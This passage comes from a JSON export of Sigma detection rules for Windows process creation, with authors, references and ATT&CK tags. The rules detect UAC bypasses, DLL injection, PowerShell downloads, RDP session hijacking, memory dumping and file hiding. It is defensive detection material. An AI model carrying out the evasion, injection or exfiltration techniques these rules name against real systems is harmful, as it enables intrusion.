"attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "178e615d-e666-498b-9630-9ed363038101", "value": "Elevated System Shell Spawned From Uncommon Parent Location" }, { "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or 
binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "creation_date": "2019-06-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_explorer_break_process_tree.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", "https://twitter.com/nas_bench/status/1535322450858233858", "https://twitter.com/bohops/status/1276357235954909188?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "value": "Explorer Process Tree Break" }, { "description": "Detects execution of \"tar.exe\" in order to extract compressed file.\nAdversaries may abuse various utilities in order to decompress data to avoid detection.\n", "meta": { "author": "AdmU3", "creation_date": "2023-12-19", "falsepositive": [ "Likely" ], "filename": "proc_creation_win_tar_extraction.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", "https://unit42.paloaltonetworks.com/chromeloader-malware/", "https://lolbas-project.github.io/lolbas/Binaries/Tar/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_extraction.yml" ], 
"tags": [ "attack.collection", "attack.exfiltration", "attack.t1560", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf361876-6620-407a-812f-bfe11e51e924", "value": "Compressed File Extraction Via Tar.EXE" }, { "description": "Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_download_susp_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_susp_file_sharing_domains.yml" ], "tags": [ "attack.execution" ] }, "uuid": "b6e04788-29e1-4557-bb14-77f761848ab8", "value": "Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE" }, { "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_inline_win_api_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/m417z/status/1566674631788007425", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_inline_win_api_access.yml" ], "tags": [ "attack.execution", "attack.t1106" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "value": "Potential WinAPI Calls Via CommandLine" }, { "description": "Detects inline Windows shell commands redirecting output via the \">\" symbol to a suspicious location.\nThis technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as \"hostname\" and \"dir\" to files for future exfiltration.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Legitimate admin or third party scripts used for diagnostic collection might generate some false positives" ], "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "value": "Potentially Suspicious CMD Shell Output Redirect" }, { "description": "Detects the execution of whoami.exe with suspicious parent processes.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-12", "falsepositive": [ "Admin activity", "Scripts and administrative tools used in the monitored environment", "Monitoring activity" ], "filename": "proc_creation_win_whoami_parent_anomaly.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "value": "Whoami.EXE Execution Anomaly" }, { "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", "meta": { "author": "frack113, Florian Roth", "creation_date": "2021-07-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://twitter.com/gN3mes1s/status/941315826107510784", "https://twitter.com/Hexacorn/status/776122138063409152", "https://github.com/SigmaHQ/sigma/issues/3742", 
"https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.001", "attack.t1218.013" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1bae753e-8e52-4055-a66d-2ead90303ca9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "value": "Mavinject Inject DLL Into Running Process" }, { "description": "Detects execution of \"Tpmvscmgr.exe\" to create a new virtual smart card.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-15", "falsepositive": [ "Legitimate usage by an administrator" ], "filename": "proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c633622e-cab9-4eaa-bb13-66a1d68b3e47", "value": "New Virtual Smart Card Created Via TpmVscMgr.EXE" }, { "description": "Detects the pattern of UAC Bypass via 
WSReset usable by default sysmon-config", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", "value": "UAC Bypass WSReset" }, { "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1479094189048713219", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "value": "DumpStack.log Defender Evasion" }, { "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. 
sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "meta": { "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Highly likely if rar is a default archiver in the monitored environment." ], "filename": "proc_creation_win_rar_compress_data.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compress_data.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", "value": "Files Added To An Archive Using Rar.EXE" }, { "description": "Detects potential RDP Session Hijacking activity on Windows systems", "meta": { "author": "@juju4", "creation_date": "2022-12-27", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Moti_B/status/909449115477659651", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml" ], "tags": [ "attack.execution" ] }, "uuid": "224f140f-3553-4cd1-af78-13d81bf9f7cc", "value": "Potential RDP Session Hijacking Activity" }, { "description": "Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.", "meta": { "author": "Christopher 
Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman", "creation_date": "2022-01-25", "falsepositive": [ "Rare false positives could occur on servers with multiple drives." ], "filename": "proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.scythe.io/library/threat-emulation-qakbot", "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "value": "LOLBIN Execution From Abnormal Drive" }, { "description": "Detects the execution of msiexec.exe from an uncommon directory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-11-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msiexec_masquerading.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/200_okay_/status/1194765831911215104", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "value": "Potential MsiExec Masquerading" }, { "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", "meta": { "author": "bohops, Bhabesh Raj", "creation_date": "2021-10-08", "falsepositive": [ "Legitimate use by VM administrator" 
], "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png", "https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", "value": "VMToolsd Suspicious Child Process" }, { "description": "Detects an uncommon child process of the \"odbcconf.exe\" binary, which normally shouldn't have any child processes.", "meta": { "author": "Harjot Singh @cyb3rjy0t", "creation_date": "2023-05-22", "falsepositive": [ "In rare occurrences where \"odbcconf\" crashes, it might spawn a \"werfault\" process", "Other child processes will depend on the DLL being registered by actions like \"regsvr\". In cases where the DLLs have external calls (which should be rare), other child processes might spawn and additional filters need to be applied." 
], "filename": "proc_creation_win_odbcconf_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8e3c7994-131e-4ba5-b6ea-804d49113a26", "value": "Uncommon Child Process Spawned By Odbcconf.EXE" }, { "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", "meta": { "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_uacme.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "value": "HackTool - UACMe Akagi Execution" }, { "description": "This rule detects the execution of Run Once task as configured in the registry", "meta": { "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock 
(updated)", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_runonce_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", "https://twitter.com/pabraeken/status/990717080805789697", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_runonce_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", "value": "Run Once Task Execution as Configured in Registry" }, { "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", "meta": { "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2018-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49", "https://github.com/sensepost/ruler", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", "value": "Suspicious Remote Child Process From Outlook" }, { "description": "Detects potentially suspicious child processes of \"regsvr32.exe\".", "meta": { "author": "elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-05", "falsepositive": [ "Unlikely, but can rarely occur. Apply additional filters accordingly." ], "filename": "proc_creation_win_regsvr32_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-april-2022/", "https://www.echotrail.io/insights/search/regsvr32.exe", "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "value": "Potentially Suspicious Child Process Of Regsvr32" }, { "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_java_remote_debugging.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_remote_debugging.yml" ], "tags": [ "attack.t1203", "attack.execution" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "value": "Java Running with Remote Debugging" }, { "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "meta": { "author": "Florian Roth (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_icmluautil.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "value": "UAC Bypass via ICMLuaUtil" }, { "description": "Detects execution of \"rundll32\" with potential obfuscated ordinal calls", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_obfuscated_ordinal_call.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml" ], "tags": [ "attack.defense-evasion" ] 
}, "uuid": "43fa5350-db63-4b8f-9a01-789a427074e1", "value": "Potential Obfuscated Ordinal Call Via Rundll32" }, { "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-07", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_dinjector.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dinjector.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", "value": "HackTool - DInjector PowerShell Cradle Execution" }, { "description": "Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by the 6th positional argument", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "creation_date": "2022-12-24", "falsepositive": [ "Legitimate use via Intune management. Exclude script paths and names to reduce the FP rate" ], "filename": "proc_creation_win_agentexecutor_potential_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", "https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "value": "AgentExecutor PowerShell Execution" }, { "description": "Detects the use of 3proxy, a tiny free proxy server", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-13", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_pua_3proxy_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/3proxy/3proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1572" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", "value": "PUA - 3Proxy Execution" }, { "description": "Detects shell32.dll executing a DLL in a suspicious directory", "meta": { "author": "Christian Burkard 
(Nextron Systems)", "creation_date": "2021-11-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.group-ib.com/resources/threat-research/red-curl-2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", "value": "Shell32 DLL Execution in Suspicious Directory" }, { "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dumpminitool_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/", "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", "value": "DumpMinitool Execution" }, { "description": "Detects usage of attrib.exe to hide files from users.", "meta": { "author": "Sami Ruohonen", "creation_date": "2019-01-16", "falsepositive": [ "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", "Msiexec.exe hiding desktop.ini" ], "filename": "proc_creation_win_attrib_hiding_files.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.uptycs.com/blog/lolbins-are-no-laughing-matter", "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4281cb20-2994-4580-aa63-c8b86d019934", "value": "Hiding Files with Attrib.exe" }, { "description": "Detect use of X509Enrollment", "meta": { "author": "frack113", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "proc_creation_win_powershell_x509enrollment.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", 